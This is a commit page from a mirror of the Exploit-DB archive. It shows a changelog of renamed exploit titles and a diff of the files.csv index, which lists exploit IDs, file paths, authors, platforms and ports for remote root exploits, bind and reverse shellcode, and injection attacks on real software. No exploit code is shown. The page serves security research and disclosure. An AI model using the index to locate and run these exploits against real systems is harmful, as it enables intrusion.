bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-06

Browse source 
5 new exploits

Foxit Reader 4.1.1 - Stack Overflow (Egghunter Mod)
Foxit Reader 4.1.1 - Stack Overflow (Egghunter)

iSQL 1.0 - Shell Command Injection
iSQL 1.0 - Command Injection
Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection
Microsoft Excel Starter 2010 - XML External Entity Injection
Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection

Samba 2.2.x - Remote Root Buffer Overflow
Samba 2.2.x - Buffer Overflow
PoPToP PPTP 1.1.4-b3 - Remote Root Exploit
Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit
PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit
PoPToP PPTP 1.1.4-b3 - Remote Command Execution
Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution
PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution

Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit
Sendmail 8.12.8 - Prescan() BSD Remote Command Execution

WsMp3d 0.x - Remote Root Heap Overflow
WsMp3d 0.x - Heap Overflow

Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit
Atftpd 0.6 - 'atftpdx.c' Remote Command Execution

Samba 2.2.8 - (Brute Force Method) Remote Root Exploit
Samba 2.2.8 - (Brute Force Method) Remote Command Execution

WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit
WU-FTPD 2.6.2 - Off-by-One Remote Command Execution

WU-FTPD 2.6.2 - Remote Root Exploit
WU-FTPD 2.6.2 - Remote Command Execution

WU-FTPD 2.6.0 - Remote Root Exploit
WU-FTPD 2.6.0 - Remote Command Execution

LPRng 3.6.22/23/24 - Remote Root Exploit
LPRng 3.6.22/23/24 - Remote Command Execution

LPRng 3.6.24-1 - Remote Root Exploit
LPRng 3.6.24-1 - Remote Command Execution
WU-FTPD 2.6.1 - Remote Root Exploit
SSH (x2) - Remote Root Exploit
WU-FTPD 2.6.1 - Remote Command Execution
SSH (x2) - Remote Command Execution

BSD TelnetD - Remote Root Exploit (1)
BSD TelnetD - Remote Command Execution (1)

Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution

ProFTPd IAC 1.3.x - Remote Root Exploit
ProFTPd IAC 1.3.x - Remote Command Execution

Exim 4.63 - Remote Root Exploit
Exim 4.63 - Remote Command Execution

Splunk - Remote Root Exploit
Splunk - Remote Command Execution

FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
FreeBSD OpenSSH 3.5p1 - Remote Command Execution

HP Data Protector (Linux) - Remote Root Shell
HP Data Protector (Linux) - Remote Command Execution

FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit
FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Root Remote Code Execution)
Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Remote Code Execution)

BSD TelnetD - Remote Root Exploit (2)
BSD TelnetD - Remote Command Execution (2)

Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution)
Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Remote Command Execution)

Sendmail 8.6.9 IDENT - Remote Root Exploit
Sendmail 8.6.9 IDENT - Remote Command Execution

Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Shell
Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Exploit

ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQL Injection
ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection

H-Sphere Webshell 2.4 - Remote Root Exploit
H-Sphere Webshell 2.4 - Remote Command Execution

MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit
MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution

Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution
Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution

Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access
Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution

Novell NCP - Unauthenticated Remote Root Exploit
Novell NCP - Unauthenticated Remote Command Execution

Seowonintech Devices - Remote Root Exploit
Seowonintech Devices - Remote Command Execution

ASUS RT-AC66U - acsd Parameter Remote Root Shell
ASUS RT-AC66U - 'acsd' Parameter  Remote Command Execution

ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)
ASUS RT-N56U - Remote Buffer Overflow (ROP)

NovaSTOR NovaNET 12.0 - Remote Root Exploit
NovaSTOR NovaNET 12.0 - Remote Command Execution

ALCASAR 2.8 - Remote Root Code Execution
ALCASAR 2.8 - Remote Code Execution

F5 iControl - Remote Root Command Execution (Metasploit)
F5 iControl - Remote Command Execution (Metasploit)

Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)

Seagate Central 2014.0410.0026-F - Remote Root Exploit
Seagate Central 2014.0410.0026-F - Remote Command Execution

Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit
Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution

Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)
BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution
Alcatel Lucent Omnivista 8770 - Remote Code Execution

Windows x86 - Password Protected TCP Bind Shell (637 bytes)
Windows x86 - Password Protected TCP Bind Shellcode (637 bytes)

Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)

Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes)

Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)
Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)
Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)
Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes)
Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes)

Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit
Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution

SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution

D-Link DSR Router Series - Remote Root Shell
D-Link DSR Router Series - Remote Command Execution

Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities
Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities

ALCASAR 2.8.1 - Remote Root Code Execution
ALCASAR 2.8.1 - Remote Code Execution

SevOne NMS 5.3.6.0 - Remote Root Exploit
SevOne NMS 5.3.6.0 - Remote Command Execution

Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution
Iris ID IrisAccess ICU 7000-2 - Remote Command Execution

NUUO NVRmini 2 3.0.8 - Remote Root Exploit
NUUO NVRmini 2 3.0.8 - Remote Code Execution

EyeLock nano NXT 3.5 - Remote Root Exploit
EyeLock nano NXT 3.5 - Remote Code Execution

InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution
This commit is contained in:
Offensive Security 2016-12-06 05:01:19 +00:00
parent aa4fced35c
commit 5dc941e36b
7 changed files with 954 additions and 65 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

133
files.csv
View file

@ -6563,7 +6563,7 @@ id,file,description,date,author,platform,type,port
15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Exploit",2010-11-14,BraniX,windows,local,0
15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Exploit",2010-11-14,BraniX,windows,local,0
15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Exploit",2010-11-14,BraniX,windows,local,0
15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter Mod)",2010-11-15,dookie,windows,local,0
15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter)",2010-11-15,dookie,windows,local,0
15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0
15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0
15575,platforms/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Buffer Overflow (Egghunter)",2010-11-19,0v3r,windows,local,0
@ -8550,7 +8550,7 @@ id,file,description,date,author,platform,type,port
39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0
39916,platforms/windows/local/39916.txt,"Riot Games League of Legends - Insecure File Permissions Privilege Escalation",2016-06-10,"Cyril Vallicari",windows,local,0
39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0
39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0
39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Command Injection",2016-06-13,HaHwul,linux,local,0
39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
@ -8670,29 +8670,32 @@ id,file,description,date,author,platform,type,port
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
40848,platforms/windows/local/40848.java,"WinPower 4.9.0.4 - Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local,0
40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723
18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit",2003-04-23,truff,linux,remote,0
19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit",2003-04-25,blightninjas,linux,remote,1723
16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139
23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Exploit",2003-04-30,"Johnny Cyberpunk",windows,remote,554
24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25
24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Command Execution",2003-04-30,bysin,linux,remote,25
25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0
26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",linux,remote,0
27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80
28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote,0
30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0
33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000
33,platforms/linux/remote/33.c,"WsMp3d 0.x - Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000
34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80
36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
@ -8703,7 +8706,7 @@ id,file,description,date,author,platform,type,port
50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21
55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139
55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139
56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80
57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0
58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
@ -8713,10 +8716,10 @@ id,file,description,date,author,platform,type,port
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
76,platforms/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal)",2003-08-07,oc192,windows,remote,135
77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80
78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21
78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Command Execution",2003-08-11,Xpl017Elz,linux,remote,21
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow",2003-08-13,"David Litchfield",windows,remote,2100
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0
83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (MS03-032)",2003-08-21,malware,windows,remote,0
@ -8778,17 +8781,17 @@ id,file,description,date,author,platform,type,port
190,platforms/windows/remote/190.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)",2000-11-18,Optyx,windows,remote,80
191,platforms/windows/remote/191.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (7)",2000-11-18,steeLe,windows,remote,80
192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80
201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21
201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21
204,platforms/linux/remote/204.c,"BFTPd - vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21
208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119
211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0
213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111
220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80
225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21
226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515
226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,linux,remote,515
227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String",2000-12-11,DiGiT,linux,remote,515
228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128
230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515
230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515
232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0
234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6 / 2.7 - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513
@ -8825,8 +8828,8 @@ id,file,description,date,author,platform,type,port
340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23
347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Root Exploit",2002-05-01,Teso,multiple,remote,22
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535
361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
@ -8849,7 +8852,7 @@ id,file,description,date,author,platform,type,port
404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Root Exploit (1)",2001-06-09,Teso,bsd,remote,23
409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
@ -9520,7 +9523,7 @@ id,file,description,date,author,platform,type,port
4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128
4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25
4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25
4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80
4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",hardware,remote,0
4806,platforms/windows/remote/4806.html,"Persits Software XUpload Control - AddFolder() Buffer Overflow",2007-12-28,Elazar,windows,remote,0
@ -10315,7 +10318,7 @@ id,file,description,date,author,platform,type,port
15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0
15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,windows,remote,0
15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,linux,remote,0
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0
15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0
@ -10330,7 +10333,7 @@ id,file,description,date,author,platform,type,port
15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow",2010-12-05,0v3r,windows,remote,0
15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0
15723,platforms/freebsd/remote/15723.c,"FreeBSD Litespeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Command Execution",2010-12-11,kingcope,linux,remote,0
15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - 'PrintControl.dll' ActiveX Exploit",2010-12-14,Dr_IDE,windows,remote,0
15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0
15802,platforms/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0
@ -10344,7 +10347,7 @@ id,file,description,date,author,platform,type,port
15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - 'src .php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0
15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
18245,platforms/multiple/remote/18245.py,"Splunk - Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0
18245,platforms/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0
15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0
15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote,0
15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0
@ -11004,7 +11007,7 @@ id,file,description,date,author,platform,type,port
17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote,0
